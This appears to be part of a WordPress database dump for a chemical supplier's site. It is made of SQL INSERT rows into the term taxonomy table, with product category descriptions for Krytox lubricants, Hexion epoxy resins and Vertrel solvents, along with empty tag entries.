INSERT INTO `wp_term_taxonomy` VALUES (115, 115, 'product_cat', 'Krytox XHT Grease XHT-AC and XHT-ACX greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400°F). Krytox XHT Grease are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BD greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\r\n\r\nKrytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-S series greases are nonflammable, oxygencompatible, chemically inert, and provide extended lubrication intervals and longer equipment life.', 40, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (116, 116, 'product_cat', 'Krytox XHT series oils are special extreme high temperature grade oils with low evaporation and extra treatment to allow use at temperatures above the range of normal PFPE oils. These oils provide excellent lubrication over a broad temperature range. Krytox XHT series oils are nonflammable and chemically inert.', 40, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (117, 117, 'category', 'Application based articles from Chemours regarding Krytox.', 0, 36); 
INSERT INTO `wp_term_taxonomy` VALUES (118, 118, 'product_tag', '', 0, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (119, 119, 'product_tag', '', 0, 9); 
INSERT INTO `wp_term_taxonomy` VALUES (120, 120, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (121, 121, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (122, 122, 'product_cat', 'Krytox XHT-AC and XHT-ACX greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT-AC series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox XHT-AC series greases contain sodium nitrite to offer anti-corrosion performance. These greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.', 115, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (123, 123, 'product_cat', 'Krytox XHT-BD series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BD series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nKrytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BD greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.', 115, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (124, 124, 'product_cat', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT series greases are nonflammable, oxygen compatible, chemically inert, and provide extended lubrication intervals and longer equipment life.\r\n\r\nThe Krytox XHT-S series greases are an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox XHT-S series greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-S series greases contain no additives, so they are used when a potential for interaction between process chemicals and grease additives exists. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.', 115, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (125, 125, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (126, 126, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (127, 127, 'product_cat', 'Epikure Curing agents by Hexion offer high performance and specialty curing solutions to a variety of epoxy resin formulations. Our extensive product line includes several high performance specialty curatives to meet difficult coatings requirements. We offer amine hardeners that are designed for low temperature cure, blush-free film, surface-tolerant tank linings, underwater cure and MDA replacements. Miller-Stephenson is continually working to satisfy the various performance needs of our customers. The numerous epoxy curing agent technologies offered by Hexion also enable our customers to tailor the performance of their formulations to meet the challenging demands of their customers, while satisfying regulatory requirements.\r\n\r\nEPIKURE curing agents products find many uses in coatings, adhesives, potting, encapsulating, molding and fiber-reinforced plastics (FRP) and other applications. Popular end-use areas include marine, industrial maintenance pipe linings, automotive refinish, civil engineering and secondary containment. As a leader in the epoxy resin industry, we\'re committed to constantly improving and strengthening our innovative line of epoxy resin and curing agent systems.', 93, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (128, 128, 'product_cat', 'Hexion\'s EPI-REZ Epoxy Resins are Waterborne Resins systems that allow formulator to reduce VOC while maintaining performance and structural strength. Hexion\'s EPI-REZ™ Epoxy Waterborne Resins and EPIKURE™ Curing Agents for waterborne systems are a unique portfolio of products that are compatible with each other, and allow the formulator to develop waterborne formulations that in many instances are capable substitutes to formulations containing a high portion of Volatile Organic Compounds. These combinations can generally be diluted to a desired solids level simply with water addition. Due to their high degree of compatibility with many components, EPI-REZ Epoxy Resins and/or EPIKURE Curing Agents can also be formulated with wetting agents, additives, cosolvents and coupling agents to obtain formulations for fast dry as well as high after cure corrosion resistance and superior adhesion to various substrates.\r\n\r\nEPI-REZ Waterborne Resins can be used in most traditional applications such as in flooring, adhesives, anti-corrosive primers and textile binders to reduce or eliminate Volatile Organic Compounds without sacrificing performance. EPI-REZ Waterborne Resins are also used to coat engineering fibers in order to provide superior matrix adhesion in high performing fiber reinforced composite applications. Due to the ease in handling, waterborne epoxies can now be used in many nontraditional applications where solvent-borne and highly viscous epoxy resins could not be used. EPI-REZ waterborne resins can also be combined with other waterborne polymers, such as polyurethanes, various latex polymers and phenolic resins, such that unique performance properties can be obtained.', 93, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (129, 129, 'product_cat', 'Hexion\'s epoxy functional product line of HELOXY Epoxy Functional Modifiers offers formulators the ability to choose between monofunctional and polyfunctional glycidyl ethers, and flexibilizers for their formulating needs. HELOXY modifiers offer: Improved cured system flexibility, increased peel and impact strength, increased levels of filler loading, improved resin wetting action, and reduced viscosity and surface tension. HELOXY™ modifiers are epoxy functionalized alcohols, diols, polyols and acids. Hexion offers three classes of HELOXY Modifiers: monofunctional glycidyl ethers, polyfunctional glycidyl ethers and polyfunctional flexibilizers. Areas of application for HELOXY modifiers include coatings, civil engineering, adhesives, FRP applications, potting and molding.\r\n\r\nThe monofunctional HELOXY products include both aliphatics and aromatics and are primarily utilized as diluents for a variety of epoxy resins. The polyfunctional HELOXY products are aliphatics that provide an increase in the chemical resistance and mechanical performance of the system. The HELOXY  flexibilizers can improve wetting performance, offer good color properties for outdoor applications, and can increase the impact strength and toughness of a system.', 93, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (130, 130, 'product_cat', 'The Krytox NRT 8900 series oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT 8900 lubricants are also compatible with polymers used in seals, O-rings, and valves.\r\n\r\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox™ greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.', 36, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (131, 131, 'product_cat', 'Krytox NRT oils and greases are designed specifically for critical oxygen service equipment, where failure is not an option. With more than 40 years of experience, Chemours offers lubricants that meet the demanding needs of oxygen and reactive gas applications.\r\n\r\nNRT PLSS is NSF-H1 Rated for incidental food contact. ', 36, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (132, 132, 'product_tag', '', 0, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (133, 133, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (134, 134, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (135, 135, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (136, 136, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (137, 137, 'product_cat', '', 95, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (138, 138, 'product_cat', '', 95, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (139, 139, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (140, 140, 'product_tag', '', 0, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (141, 141, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (142, 142, 'product_cat', '', 95, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (143, 143, 'product_cat', '', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (144, 144, 'product_cat', '', 95, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (145, 145, 'product_cat', '', 95, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (146, 146, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (147, 147, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (148, 148, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (149, 149, 'product_cat', '<a href="https://www.miller-stephenson.com/krytox/">Krytox™</a>: Engineered for applications where extreme temperatures, non-flammability, oxygen compatibility, longevity, and resistance to caustic chemicals are critical, Krytox™ performs where other lubricants fail. Krytox is a high performance perfluoropolyether (PFPE) synthetic lubricant which thrives in tough challenges, in the most unforgiving environments, across a wide array of industries.\r\n\r\nTriboSys: Miller-Stephenson\'s exclusive line of industrial, medical, and food-grade lubricant. Our lubricant offer superior lubricity and longevity while minimizing wear and heat generation.\r\n\r\nTeflon Lubricant: DuPont™ series of industrial and commercial lubricants which are fortified with polytetrafluorethylene (PTFE) and other proprietary additives. These formulations offer robust performance versus standard hydrocarbon and silicone oil based lubricant.', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (150, 150, 'product_cat', 'Miller-Stephenson offers DuPont™ Teflon Lubricants, a unique series of industrial and commercial lubricants and grease, fortified with PTFE (Teflon) and proprietary additives to greatly enhance performance and longevity. Cars, boats, tractors, power tools and industrial equipment are expensive purchases, which is why you’ll want to properly maintain them. We offer a complete line of high-performance, technologically-driven lubricants and greases to meet your every need. Most of these products are formulated with Teflon® fluoropolymer to deliver a longer lubricant life, expanded temperature range and provide better resistance to chemicals. From automotive and marine to lawn and garden and sporting goods, we offer a complete line of high-performance, technologically driven lubricant and grease products to meet your every need. Most of these products are formulated with DuPont™ Teflon® fluoropolymer to deliver a longer lubricant life, expanded temperature range and better resistance to chemicals.\r\n\r\nBenefit  from our array of high-quality, industrial-strength greases including: DuPont™ White Lithium Grease with Teflon®, DuPont™ Marine Waterproof Grease with Teflon®, DuPont™ High-Temp Grease with Teflon®, DuPont™ Heavy Equipment Grease with Teflon® and DuPont™ Severe Service Grease with Teflon®, and Teflon-fortified Silicone lubricants.', 149, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (151, 151, 'product_cat', 'TriboSys lubricants are a Miller-Stephenson brand of specialty greases and oils made to tackle the needs of industries worldwide. These lubricants are categorized into 3 groups. Connector lubricants, which are specially made for multi-pin connectors and electronic connectors. Industrial Oils & Greases are a Miller-Stephenson brand of synthetic lubricants designed to beat hydrocarbons in a wide variety of lubricant applications. Lastly, our PFPE fluorinated lubricants are compacted into aerosol form for precise delivery in hard to reach areas. ', 149, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (152, 152, 'product_cat', '', 95, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (153, 153, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (154, 154, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (155, 155, 'product_cat', 'EPONEX™ Resins are unique low viscosity epoxy resins designed to have improved performance compared to conventional bisphenol-A (BPA) type resins. These EPONEX reins are cycloaliphatic glycidyl ethers used to obtain epoxy performance in coatings, electronics and specialty composites where <strong>UV resistance is a requirement</strong>. EPONEX Resins are recommended as a building block resin for preparations of low viscosity/higher molecular weight epoxide resins and low viscosity esters using conventional esterification reactants. It can also be used as a reactive viscosity reducer and a modifier for improved color in BPA-based epoxy resins. EPONEX cycloaliphatic epoxy resins are high performance products for use in adhesive, civil engineering, electrical, composite and many other applications where improved outdoor resistance.', 93, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (156, 156, 'product_cat', 'Krytox greases for Electronics. These greases are non-reactive and non-flammable. They have the same properties as the 143 series oil but thickened into a grease form. ', 9, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (157, 157, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (158, 158, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (159, 159, 'product_cat', '', 95, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (160, 160, 'product_cat', '', 86, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (161, 161, 'product_cat', '', 95, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (162, 162, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (163, 163, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (164, 164, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (165, 165, 'product_cat', '<strong>Krytox™  TS4 thread sealant</strong>, the solution for demanding applications, is designed for use on a variety of metal and plastic surfaces. Unlike PTFE tape, which should be removed before re-application, Krytox TS4 can be re-applied over existing Krytox thread sealant. Krytox TS4 is conveniently available in 0.5, 2, and 8 oz tubes, 0.5 kg jars, and other size containers available upon request.\r\n<h4>Key Benefits</h4>\r\n<ul>\r\n 	<li>Unlike PTFE Teflon tape, Krytox TS4 can be re-applied over existing Krytox thread sealant without issue.</li>\r\n 	<li>Clings to threads and will not shred or tear on assembly/disassembly.</li>\r\n 	<li>Cannot plug or restrict critical piping, valves, or instruments like tape solids.</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers.</li>\r\n 	<li>No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures.</li>\r\n 	<li>Cost-effective—only a small amount of sealant needed per application.</li>\r\n 	<li>Fast and easy to apply, even while wearing protective gloves.</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Tested leak free under helium at 400 psi for 7 days.*</li>\r\n</ul>', 9, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (166, 166, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (167, 167, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (168, 168, 'product_cat', 'Krytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives. The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\nKrytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications. Krytox lubricant XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection against corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (169, 169, 'product_cat', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.', 168, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (170, 170, 'product_cat', 'Krytox lubricant XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.', 168, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (171, 171, 'product_cat', '', 34, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (172, 172, 'product_tag', '', 0, 16); 
INSERT INTO `wp_term_taxonomy` VALUES (173, 173, 'product_tag', '', 0, 16); 
INSERT INTO `wp_term_taxonomy` VALUES (174, 174, 'product_cat', 'Low-melting solid epoxy which contains 48 wt% bromine imparting fire retardancy in laminating, casting, electrical and molding application.', 95, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (175, 175, 'product_cat', '', 127, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (176, 176, 'product_cat', '', 127, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (177, 177, 'product_cat', '', 127, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (178, 178, 'product_cat', '', 127, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (179, 179, 'product_cat', '', 127, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (180, 180, 'product_cat', '', 129, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (181, 181, 'product_cat', '', 129, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (182, 182, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (183, 183, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (184, 184, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (185, 185, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (186, 186, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (187, 187, 'product_tag', '', 0, 13); 
INSERT INTO `wp_term_taxonomy` VALUES (188, 188, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (189, 189, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (190, 190, 'product_tag', '', 0, 9); 
INSERT INTO `wp_term_taxonomy` VALUES (191, 191, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (192, 192, 'product_tag', '', 0, 13); 
INSERT INTO `wp_term_taxonomy` VALUES (193, 193, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (194, 194, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (195, 195, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (196, 196, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (197, 197, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (198, 198, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (199, 199, 'post_tag', '', 0, 19); 
INSERT INTO `wp_term_taxonomy` VALUES (200, 200, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (201, 201, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (202, 202, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (203, 203, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (204, 204, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (205, 205, 'post_tag', '', 0, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (206, 206, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (207, 207, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (208, 208, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (209, 209, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (210, 210, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (211, 211, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (212, 212, 'category', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (213, 213, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (214, 214, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (215, 215, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (216, 216, 'category', '', 0, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (217, 217, 'post_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (218, 218, 'post_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (219, 219, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (220, 220, 'post_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (221, 221, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (222, 222, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (223, 223, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (224, 224, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (225, 225, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (226, 226, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (227, 227, 'product_cat', '', 93, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (228, 228, 'product_cat', '', 93, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (229, 229, 'product_cat', '', 129, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (230, 230, 'product_cat', '', 129, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (231, 231, 'product_cat', '', 10, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (232, 232, 'product_cat', 'Vertrel specialty fluids are a family of nonflammable, versatile fluids that can be used in numerous applications. These solvents are perfect for electronics defluxing, low residue precision cleaning, oxygen cleaning, lubricant deposition, solvating and fluorinated lubricants. Vertrel solvents are particularly effective as direct drop-in replacements for n-propyl bromide (nPB), HCFC-225, and trichloroethylene (TCE). <a href="https://www.miller-stephenson.com/vertrel-fluids/">For more information about this replacement process and reasons to make this switch see our article section</a>. Vertrel specialty solvents have proprietary solvent blends yielding excellent cleaning and solvation efficiencies for a wide variety of substrates and applications: Our current selection includes Vertrel <a href="https://www.miller-stephenson.com/product/vertrel-mca/">MCA / MCA Plus</a>, <a href="https://www.miller-stephenson.com/product/vertrel-sdg/">SDG</a>, <a href="https://www.miller-stephenson.com/product/vertrel-sfr/">SFR</a>, <a href="https://www.miller-stephenson.com/product/vertrel-smt/">SMT</a>, <a href="https://www.miller-stephenson.com/product/vertrel-x-si/">X-Si</a>, and <a href="https://www.miller-stephenson.com/product/vertrel-xf/">XF</a>. We also carry aerosolized versions of these solvent help aid in applications efficiency and to aid in precision cleaning of delicate or intricate applications. Benefits of Vertrel specialty fluids include:\r\n<ul>\r\n 	<li>Safe to use (direct replacement for nPB and TCE)</li>\r\n 	<li>Designed to clean a wide range of soils</li>\r\n 	<li>100% Nonflammabe; Fast drying; Residue-free</li>\r\n 	<li>Compatible with a broad range of metals, plastics and elastomers</li>\r\n 	<li>Chemically and thermally stable</li>\r\n</ul>\r\nWe also carry <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a>, a safe, nonflammable and low environmental impact specialty fluids with similar cleaning and solvation properties as Vertrel but designed to all meet current and future stringent regulations. Opteon Sion also is particularly effective at vapor degreasing applications.', 10, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (233, 233, 'product_tag', '', 0, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (234, 234, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (235, 235, 'product_tag', '', 0, 9); 
INSERT INTO `wp_term_taxonomy` VALUES (236, 236, 'product_tag', '', 0, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (237, 237, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (238, 238, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (239, 239, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (240, 240, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (241, 241, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (242, 242, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (243, 243, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (244, 244, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (245, 245, 'product_tag', '', 0, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (247, 247, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (248, 248, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (249, 249, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (250, 250, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (251, 251, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (252, 252, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (253, 253, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (254, 254, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (255, 255, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (256, 256, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (257, 257, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (258, 258, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (259, 259, 'category', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (260, 260, 'product_cat', 'Krytox oils &amp; greases in aerosol. ', 151, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (261, 261, 'product_cat', 'Non-fluorinated oils and greases.', 151, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (262, 262, 'product_cat', 'Miller-Stephenson Connector Lubricants contain polyphenyl ether (PPE). These lubricants can help protect noble metal connector surfaces from wear, oxidation and tarnishing. They help prevent galling and seizing of precious metal connector surfaces. The polyphenyl ether lubricants are completely inert toward plastics and other materials used in electrical connectors. They are non-migrating and do not impede the flow of electrical current through the contacts.\r\n\r\n', 151, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (263, 263, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (264, 264, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (265, 265, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (266, 266, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (267, 267, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (268, 268, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (269, 269, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (270, 270, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (271, 271, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (272, 272, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (273, 273, 'product_tag', '', 0, 1); 
